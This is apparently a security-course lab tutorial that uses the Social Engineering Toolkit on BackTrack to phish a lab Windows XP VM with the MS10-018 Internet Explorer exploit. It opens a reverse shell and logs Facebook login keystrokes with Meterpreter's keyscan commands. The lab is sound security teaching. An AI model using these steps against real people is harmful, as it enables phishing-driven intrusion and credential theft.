ComputerSecurityStudent (CSS) [Login] [Join Now]




|UNIX >> BackTrack >> BackTrack 5 R1 >> Current Page |Views: 13509

(Social Engineering Toolkit (SET): Lesson 2)

{ Create Malicious Weblink to Sniff Victim's Keystrokes }


Section 0. Background Information
  • What is the Social-Engineering Toolkit (SET)
    • The Social-Engineering Toolkit (SET) is a python-driven suite of custom tools which solely focuses on attacking the human element of penetration testing.
    • It's main purpose is to augment and simulate social-engineering attacks and allow the tester to effectively test how a targeted attack may succeed.
    • Social-Engineering toolkit available on backtrack like on backtrack 5, backbox, blackbuntu, Gnacktrack and other Linux distribution that are used for penetration testing.

     

  • Social Engineering Note
    • Image an attacker embedding the malicious link (See Section 4, Step 9) in an email to a possible victim.
    • The Victim does not inspect the link before he clicks on it to notice that the link is an IP Address instead of a domain name.  In addition the IP Address is listening on a different port. 
      • (ie., http://192.168.1.105:8080) 
    • This type of attack is especially dangerous because it crashes the victim's web browser, and the victim does not realize that the following has occurred:
      1. A Metasploit payload was injected to their system
      2. A Metasploit session is attached to their system
      3. The attached session was migrated from iexplorer.exe to notpad.exe.
  • Legal Disclaimer
    • As a condition of your use of this Web site, you warrant to computersecuritystudent.com that you will not use this Web site for any purpose that is unlawful or that is prohibited by these terms, conditions, and notices.
    • In accordance with UCC § 2-316, this product is provided with "no warranties, either express or implied." The information contained is provided "as-is", with "no guarantee of merchantability."
    • In addition, this is a teaching website that does not condone malicious behavior of any kind.
    • Your are on notice, that continuing and/or using this lab outside your "own" test environment is considered malicious and is against the law.
    • © 2013 No content replication of any kind is allowed without express written permission.
Section 1. Configure BackTrack Virtual Machine Settings
  1. Open Your VMware Player
    • Instructions:
      1. On Your Host Computer, Go To
      2. Start --> All Program --> VMWare --> VMWare Player

     

  2. Edit BackTrack Virtual Machine Settings
    • Instructions:
      1. Highlight BackTrack5R1
      2. Click Edit virtual machine settings

     

  3. Edit Network Adapter
    • Instructions:
      1. Highlight Network Adapter
      2. Select Bridged
      3. Do not Click on the OK Button.

 

Section 2. Login to BackTrack
  1. Start BackTrack VM Instance
    • Instructions:
      1. Start Up VMWare Player
      2. Select BackTrack5R1
      3. Play virtual machine

     

  2. Login to BackTrack
    • Instructions:
      1. Login: root
      2. Password: toor or <whatever you changed it to>.

     

  3. Bring up the GNOME
    • Instructions:
      1. Type startx

 

Section 3. Open Console Terminal and Retrieve IP Address
  1. Open a console terminal
    • Instructions:
      1. Click on the console terminal

     

  2. Get IP Address
    • Instructions:
      1. ifconfig -a
    • Notes:
      • As indicated below, my IP address is 192.168.1.105.
      • Please record your IP address.

 

Section 4. Start the Social Engineering ToolKit
  1. Start Social Engineering ToolKit
    • Instructions:
      1. cd /pentest/exploits/set
      2. ./set

     

  2. Website Attack Vector
    • Instructions:
      1. Select 2

     

  3. Select Metasploit Browser Exploit Method
    • Instructions:
      1. Select 2

     

  4. Select Web Templates
    • Instructions:
      1. Select 1

     

  5. Set Web Attack
    • Instructions:
      1. Select 3

     

  6. Microsoft Internet Explorer iepeers.dll Use After Free (MS10-018)
    • Instructions:
      1. Select 15

     

  7. Windows Shell Reverse_TCP
    • Instructions:
      1. Select 1

     

  8. Set Reverse Port
    • Instructions:
      1. Set to 5555

     

  9. Waiting for the server to start
    • Instructions:
      1. Copy the weblink that is listed above the Server started line.
      2. Continue to the next section.
    • Notes:
      • This is the malicious weblink that will be used by the attacker to to social engineer their way into the victim's machine.

 

Section 5. Start Up Windows Machine
  • Social Engineering Note
    • Image how an attacker could embed the malicious link provided in Section 4, Step 9 in an email to a possible victim.
    • This type of attack is especially dangerous because it crashes the victim's web browser, and the victim does not realize the Metasploit payload was injected and a session is now attached to a migrated notepad process.
  1. Start Up Damn Vulnerable WXP-SP2.
    • Instructions:
      1. Click on Damn Vulnerable WXP-SP2
      2. Click on Edit virtual machine Settings
    • Note(FYI):
      • For those of you not part of my class, this is a Windows XP machine running SP2.

     

  2. Edit Virtual Machine Settings
    • Instructions:
      1. Click on Network Adapter
      2. Click on the Bridged Radio button
      3. Click on the OK Button

     

  3. Play Virtual Machine
    • Instructions:
      1. Click on Damn Vulnerable WXP-SP2
      2. Click on Play virtual machine

     

  4. Logging into Damn Vulnerable WXP-SP2.
    • Instructions:
      1. Username: administrator
      2. Password: Use the Class Password or whatever you set it.

     

  5. Open a Command Prompt
    • Instructions:
      1. Start --> All Programs --> Accessories --> Command Prompt

     

  6. Obtain Damn Vulnerable WXP-SP2's IP Address
    • Instructions:
      1. ipconfig
    • Note(FYI):
      • In my case, Damn Vulnerable WXP-SP2's IP Address 192.168.1.116.
      • This is the IP Address of the Victim Machine that will be attacked by Metasploit.
      • Record your Damn Vulnerable WXP-SP2's IP Address.
     
Section 6. Start Up a Web Browser
  1. Start Up Internet Explorer
    • Instructions:
      1. Start --> All Programs --> Internet Explorer

     

  2. Victim Clicks on Link
    • Instructions:
      1. Place the BackTrack IP in the Address Bar.
        • In my case, http://192.168.1.105:8080/
        • In your case, get the IP address from Section 5, Step 9.
    • Note(FYI):
      • The Web Browser will just crash.

 

Section 7. Analyzing Results After Web Browser Crash
  1. Start up a Command Prompt
    • Instructions:
      1. All Programs --> Accessories --> Command Prompt

     

  2. Start up a Command Prompt
    • Instructions:
      1. netstat -nao | findstr 5555
      2. tasklist | findstr 2976
        • 2976 is the process ID for the Metasploit session running on port 5555.
        • In your case, the process ID will probably be different.
      3. tasklist | findstr notepad
    • Proof of Lab Instructions:
      1. date
      2. echo "Your Name"
        1. Where the string "Your Name" is your actual name.
        2. e.g., echo "John Gray"
      3. Do a PrtScn
      4. Paste into a word document

 

Section 8. Entering the Victim's Machine
  1. Get a MSF Prompt
    • Instructions:
      1. Press <Enter>, when you see the notepad.exe line.

     

  2. Obtain the Victim's Command Prompt
    • Instructions:
      1. sessions
      2. sessions -i 1
      3. execute -f cmd.exe -i -M

     

  3. Start the keystroke sniffer
    • Instructions:
      1. Press the <Ctrl> and "z" key at the same time.
        • This will put session 1 into the background.
      2. y
      3. keyscan_start
      4. Continue to next Section.

 

Section 9. Login to Facebook
  1. Start Up Internet Explorer
    • Instructions:
      1. Start --> All Programs --> Internet Explorer
     
  2. Login into Facebook
    • Instructions:
      1. Email: Use a fake address
        • first.last@victim.com, where first is your first name and last is your last name.
        • e.g., john.gray@victim.com
      2. Password: Use whatever you want.

 

Section 10. Review sniffed keystrokes
  1. Exit Web Attack Menu
    • Instructions:
      1. keyscan_dump
        • This will proceduce the Facebook
      2. keyscan_stop
    • Proof of Lab Instructions #2:
      1. Do a PrtScan
      2. Paste into same word document that contains proof of lab #1.

 

Section 11. Proof of Lab
  1. Proof of Lab
    • Instructions:
      1. Proof of Lab Instructions #1 (See Section 7, Step 2)
      2. Proof of Lab Instructions #2 (See Section 10, Step 1)
      3. Submit to Moodle.

     



Help ComputerSecurityStudent
pay for continued research,
resources & bandwidth